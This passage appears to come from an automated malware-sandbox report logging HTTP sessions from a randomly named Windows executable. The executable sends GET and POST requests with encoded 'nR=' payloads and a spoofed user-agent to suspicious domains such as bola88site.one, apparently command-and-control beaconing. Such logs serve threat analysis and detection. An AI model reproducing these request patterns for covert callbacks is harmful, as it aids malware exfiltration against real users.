                    ETag: W/"66cd104a-b96"
                    Content-Encoding: gzip
                    Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                    Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                    Sep 12, 2024 13:04:16.180789948 CEST370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                    Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    24192.168.2.549737161.97.168.245804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:04:18.122958899 CEST462OUTGET /wjff/?nR=4KVKOjLTUXvpTd2u/bZ1Xtjp48VIQpKAiZnao6g9chZjOHWeMu7z3zqylslmOgP9LXsxnQP9kQW6V1nPysVCefcRDYtQJbJyj2mk5xrQKh9CjNT1kJiwas5jw5tGEdzT0Q==&OJ=btRp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Language: en-US,en
                    Host: www.qiluqiyuan.buzz
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Sep 12, 2024 13:04:18.731256008 CEST1236INHTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 12 Sep 2024 11:04:18 GMT
                    Content-Type: text/html; charset=utf-8
                    Content-Length: 2966
                    Connection: close
                    Vary: Accept-Encoding
                    ETag: "66cd104a-b96"
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                    Sep 12, 2024 13:04:18.731272936 CEST1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                    Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                    Sep 12, 2024 13:04:18.731286049 CEST698INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                    Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    25192.168.2.549738172.96.191.39804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:04:24.039851904 CEST730OUTPOST /3lkx/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.bola88site.one
                    Origin: http://www.bola88site.one
                    Referer: http://www.bola88site.one/3lkx/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 203
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 63 67 4a 30 52 4a 73 4e 41 63 43 4a 4b 64 39 47 63 59 61 4e 77 50 4d 6e 6d 30 62 6c 4a 73 73 69 7a 4c 5a 49 37 45 51 55 2b 79 32 71 73 41 6d 47 47 55 30 6f 47 47 2b 52 45 73 68 51 7a 6f 34 75 66 47 2f 73 4d 59 4b 2f 48 63 56 53 6f 67 6c 42 73 47 39 74 49 45 33 4c 77 71 61 2f 58 36 33 35 79 32 6b 67 38 2b 41 51 56 54 54 38 69 54 2b 4f 2f 73 77 73 33 33 34 34 79 44 78 78 70 42 67 61 66 62 42 66 4f 4f 2b 2b 32 4c 59 78 47 2b 6d 73 6c 36 71 51 36 49 44 72 66 4b 6b 4e 33 6c 49 5a 4d 76 38 4c 4b 61 48 66 48 49 71 68 6d 37 2b 49 78 6d 65 59 63 31 4d 51 62 53 2b 78 30 61 2b 66 51 34 30 79 4f 70 73 3d
                    Data Ascii: nR=cgJ0RJsNAcCJKd9GcYaNwPMnm0blJssizLZI7EQU+y2qsAmGGU0oGG+REshQzo4ufG/sMYK/HcVSoglBsG9tIE3Lwqa/X635y2kg8+AQVTT8iT+O/sws3344yDxxpBgafbBfOO++2LYxG+msl6qQ6IDrfKkN3lIZMv8LKaHfHIqhm7+IxmeYc1MQbS+x0a+fQ40yOps=
                    Sep 12, 2024 13:04:24.947698116 CEST1033INHTTP/1.1 404 Not Found
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    content-type: text/html
                    content-length: 796
                    date: Thu, 12 Sep 2024 11:04:24 GMT
                    server: LiteSpeed
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    26192.168.2.549739172.96.191.39804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:04:26.696578979 CEST750OUTPOST /3lkx/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.bola88site.one
                    Origin: http://www.bola88site.one
                    Referer: http://www.bola88site.one/3lkx/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 223
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 63 67 4a 30 52 4a 73 4e 41 63 43 4a 46 5a 42 47 66 2f 75 4e 34 50 4d 6d 71 55 62 6c 47 4d 73 6d 7a 4c 56 49 37 42 77 45 2b 41 43 71 74 69 2b 47 55 6d 63 6f 54 47 2b 52 50 4d 68 66 74 59 34 6c 66 47 79 4d 4d 5a 32 2f 48 63 52 53 6f 69 74 42 76 31 6c 73 49 55 33 56 38 4b 61 35 59 61 33 35 79 32 6b 67 38 2b 6b 75 56 58 2f 38 6a 69 75 4f 2b 4e 77 76 70 6e 34 37 37 6a 78 78 74 42 67 65 66 62 42 70 4f 4b 32 59 32 49 77 78 47 36 69 73 6c 72 71 66 30 49 44 70 42 36 6b 44 6e 6c 74 46 56 4a 6f 31 4f 5a 71 75 57 5a 48 46 71 74 54 69 72 45 57 77 50 56 67 6f 4c 42 32 47 6c 71 66 32 4b 62 6b 43 51 2b 34 4c 32 65 50 71 70 47 50 77 2f 64 32 59 66 6e 36 78 48 4c 58 77
                    Data Ascii: nR=cgJ0RJsNAcCJFZBGf/uN4PMmqUblGMsmzLVI7BwE+ACqti+GUmcoTG+RPMhftY4lfGyMMZ2/HcRSoitBv1lsIU3V8Ka5Ya35y2kg8+kuVX/8jiuO+Nwvpn477jxxtBgefbBpOK2Y2IwxG6islrqf0IDpB6kDnltFVJo1OZquWZHFqtTirEWwPVgoLB2Glqf2KbkCQ+4L2ePqpGPw/d2Yfn6xHLXw
                    Sep 12, 2024 13:04:27.810235023 CEST1033INHTTP/1.1 404 Not Found
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    content-type: text/html
                    content-length: 796
                    date: Thu, 12 Sep 2024 11:04:27 GMT
                    server: LiteSpeed
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    27192.168.2.549740172.96.191.39804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:04:29.234381914 CEST1767OUTPOST /3lkx/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.bola88site.one
                    Origin: http://www.bola88site.one
                    Referer: http://www.bola88site.one/3lkx/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 1239
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 63 67 4a 30 52 4a 73 4e 41 63 43 4a 46 5a 42 47 66 2f 75 4e 34 50 4d 6d 71 55 62 6c 47 4d 73 6d 7a 4c 56 49 37 42 77 45 2b 41 36 71 73 52 32 47 47 78 41 6f 42 32 2b 52 43 73 68 63 74 59 34 6b 66 47 71 41 4d 5a 36 46 48 66 35 53 71 48 35 42 75 41 4a 73 44 55 33 56 30 71 61 38 58 36 32 6a 79 32 30 6b 38 2b 30 75 56 58 2f 38 6a 68 6d 4f 6f 73 77 76 72 6e 34 34 79 44 78 31 70 42 67 36 66 64 70 35 4f 4b 79 75 33 34 51 78 42 65 47 73 6e 5a 79 66 38 49 44 76 41 36 6c 46 6e 6c 52 73 56 4e 4a 47 4f 5a 75 49 57 61 6e 46 70 6f 32 43 79 55 58 6d 61 57 30 79 4a 67 43 38 6e 74 44 56 4d 34 34 36 56 35 70 78 36 62 33 66 75 69 75 38 33 4e 6e 57 4a 79 6d 6b 56 75 4f 6f 6d 47 51 67 31 31 30 4a 4c 59 38 4d 41 33 4b 77 4d 54 65 56 6e 71 6b 4f 35 72 59 66 30 42 64 41 67 74 57 4d 6e 66 59 49 6c 57 6f 6b 4a 6d 62 74 4f 33 67 79 58 79 64 67 43 72 7a 2b 31 72 46 39 45 77 76 47 6c 45 57 64 70 44 36 58 65 65 66 42 38 41 72 77 30 2f 6c 55 57 4a 44 73 79 63 58 63 45 31 4e 6e 71 4f 64 59 71 43 42 36 42 53 43 66 30 55 75 [TRUNCATED]
                    Data Ascii: nR=cgJ0RJsNAcCJFZBGf/uN4PMmqUblGMsmzLVI7BwE+A6qsR2GGxAoB2+RCshctY4kfGqAMZ6FHf5SqH5BuAJsDU3V0qa8X62jy20k8+0uVX/8jhmOoswvrn44yDx1pBg6fdp5OKyu34QxBeGsnZyf8IDvA6lFnlRsVNJGOZuIWanFpo2CyUXmaW0yJgC8ntDVM446V5px6b3fuiu83NnWJymkVuOomGQg110JLY8MA3KwMTeVnqkO5rYf0BdAgtWMnfYIlWokJmbtO3gyXydgCrz+1rF9EwvGlEWdpD6XeefB8Arw0/lUWJDsycXcE1NnqOdYqCB6BSCf0UuiX1O4FvFIbciGiRBgjTAmErpyGH83Y9FZMof5BIvV0QQR3cxN7pDBHVPuZRpp9f+RpL5I3OgVVP9zZvBE8n61cDkvFceI1cB4xHrhccPjCGVYUaYEjL8GMf8K35PiI/iBQxq04aPnmKScqUatmMxkqHSIFsVreYPxW3V76o8zxh8iPGxD0vj+vKUFL5C9qws2noIfKHsAnXLnjOLOzscuiAxjtO/oTi4tqLSyodxZi4BbicsjpXhd6NxHi87XE/ADKoXZZha/+gE6AgXuA+zG65HAvcPsRoG4zP9F46dW4TMiiuIEKCBvRUtW17tONy67uPOkLP0NPtWkKMYTrGAjVXrsZjytLTjOJ+5KaQpBL/7IL4w8sIzEg7LBya/JCFaEStYIVcMMRBt3sFbc9rm6P+8RJnMXBzvsJpOAWeOeQogaPglu5lACNkxaUsTQMR3xuWDbdNsTIzP2TSLM8Rq2MvzGQB6tqpbqpykn7s/mNGm27Kisl91T9ExzfCryf8zaJaSx7Qn9/DVVJUFxW4Q+BGXucMSUSvqeyBH5J/gGXT+sZCXlKFagPH8BkvmQCuiSdEH0qygpl+yFMamLWnmzaCOF3Aal0nJ+vGeXnqE7zUAbdaAqVYMRd40GQ07MxmD+ksRsD4S4SzUDQnFTfWu/qzGDV+iOmn1wF [TRUNCATED]
                    Sep 12, 2024 13:04:30.122452974 CEST1033INHTTP/1.1 404 Not Found
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    content-type: text/html
                    content-length: 796
                    date: Thu, 12 Sep 2024 11:04:29 GMT
                    server: LiteSpeed
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    28192.168.2.549741172.96.191.39804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:04:31.784569979 CEST461OUTGET /3lkx/?nR=RihUS+ZcBcWtP49fbKLPl8hUiWX9OeM0xYk2jkkE+x6ehgmefEg3XF27GOoD6ZAnAm79O7OuHoRKwHtCqV4uYWL7+sOZXKma82UzwNxpRmep+gGd7K5Ptmsj9EAWiB5wAw==&OJ=btRp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Language: en-US,en
                    Host: www.bola88site.one
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Sep 12, 2024 13:04:32.719666004 CEST1033INHTTP/1.1 404 Not Found
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    content-type: text/html
                    content-length: 796
                    date: Thu, 12 Sep 2024 11:04:32 GMT
                    server: LiteSpeed
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    29192.168.2.549742104.21.20.125804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:04:37.786297083 CEST724OUTPOST /h5qr/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.kckartal.xyz
                    Origin: http://www.kckartal.xyz
                    Referer: http://www.kckartal.xyz/h5qr/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 203
                    Cache-Control: max-age=0
